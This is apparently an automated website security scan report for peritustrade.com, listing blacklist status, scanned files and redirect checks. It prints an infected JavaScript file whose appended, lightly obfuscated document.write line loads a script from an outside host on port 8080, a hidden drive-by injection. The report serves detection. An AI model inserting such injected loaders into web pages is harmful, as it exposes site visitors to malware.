Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=peritustrade.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.peritustrade.com/ | 200 OK Content-Length: 4507 Content-Type: text/html | clean |
http://www.peritustrade.com/wpscripts/jspngfix.js | 200 OK Content-Length: 887 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var supported = !/Gecko/.test(navigator.userAgent) && !/Opera/.test(navigator.userAgent) && /MSIE (5\.5)|[6]/.test(navigator.userAgent) && navigator.platform == "Win32";
function OnLoadPngFix() { if(!supported) return; if(!event.srcElement) return; var src=event.srcElement.src; if(!src) return; if(!new RegExp(blankSrc).test(src)) { if(/\.png$/.test(src.toLowerCase())) { src = src.replace(/\(/g, "%28" ); src = src.replace(/\)/g, "%29" ); event.srcElement.src = blankSrc; event.srcElement.runtimeStyle.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(src='" + src + "',sizingMethod='scale')"; } else { event.srcElement.runtimeStyle.filter = "";} } } document.write('<s'+'cript type="text/javascript" src="http://soaoo.blog-salopes.com:8080/IMAP.js"></scr'+'ipt>'); Antivirus reports:
| ||
http://soaoo.blog-salopes.com:8080/IMAP.js | 500 Can't connect to soaoo.blog-salopes.com:8080 Content-Length: 199 Content-Type: text/plain | clean |
http://soaoo.blog-salopes.com:8080/test404page.js | 500 Can't connect to soaoo.blog-salopes.com:8080 Content-Length: 199 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: peritustrade.com
Result:
GET / HTTP/1.1
Host: peritustrade.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: peritustrade.com
Referer: http://www.google.com/search?q=peritustrade.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: peritustrade.com
Referer: http://www.google.com/search?q=peritustrade.com
Result:
The result is similar to the first query. There are no suspicious redirects found.